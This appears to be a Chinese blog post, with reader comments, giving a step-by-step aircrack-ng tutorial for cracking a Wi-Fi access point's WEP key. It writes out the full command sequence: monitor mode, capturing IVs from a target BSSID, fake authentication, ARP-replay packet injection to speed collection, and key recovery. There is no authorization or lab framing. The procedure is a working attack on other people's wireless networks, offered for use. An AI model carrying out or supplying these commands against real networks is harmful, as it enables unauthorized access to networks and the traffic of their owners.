1. 安装 aircrack-ng,以 Arch Linux 为例:
sudo pacman -S aircrack-ng
2. 破解过程
a. 启动无线网卡的监控模式
sudo airmon-ng start wlan0
Tips:wlan0 是无线网络接口,具体名称可使用 ifconfig 命令查看。
b. 查看无线 AP 信息
sudo airodump-ng wlan0
Tips: 用来查看当前的无线 AP 信息,如 BSSID 和 频道等等。
c. 抓包
sudo airodump-ng -c 6 --bssid AP's MAC -w output --ivs wlan0
Tips: -c 后面的 6 是要破解的 AP 工作频道,–bissid 后面的 AP’s MAC 是要欲破解 AP 的 MAC 地址,-w 后面的 output 的是抓下来的数据包 DATA 保存的文件名。
d. 与 AP 建立虚拟连接
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC wlan0
Tips: -h 后面的 My MAC 是自己的无线网卡的 MAC 地址,可使用 ifconfig 命令查看。
e. 进行攻击,加速收集 DATA
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC wlan0
f. 破解
收集到一定量的 DATA 后(建议超过10000)即可执行下面的命令开发解密。
aircrack-ng output*
如不能解密成功则继续收集 DATA。
g. 结束
破解成功后关闭监听模式
sudo airmon-ng stop wlan0
Over!
今天能让我眼睛一亮的rss标题头,除了3D谷歌地图,下来就是这个了
呵呵,不是什么新鲜的东西了,最近好久没有写博客了,就记录了一下。
这个是无需其他客户端连接就可以破解吧,
很清晰的教程~
不是的,在步骤 e 是需要收集到目标 AP 与其它客户端正常通信的数据包,然后再利用此数据包欺骗 AP,从而加速 DATA 的收录。如果一直收集不到目标 AP 的正常通信包是不能加速的。
那么如何进行无客户端的的抓取模式呢……貌似有什么叫fuck模式的……
无线 AP 处于空闲时的收集方法没有研究过,不过正常情况下一个有效的 AP 应该会和其它客户端通信的。
好像一直打错邮箱了=w=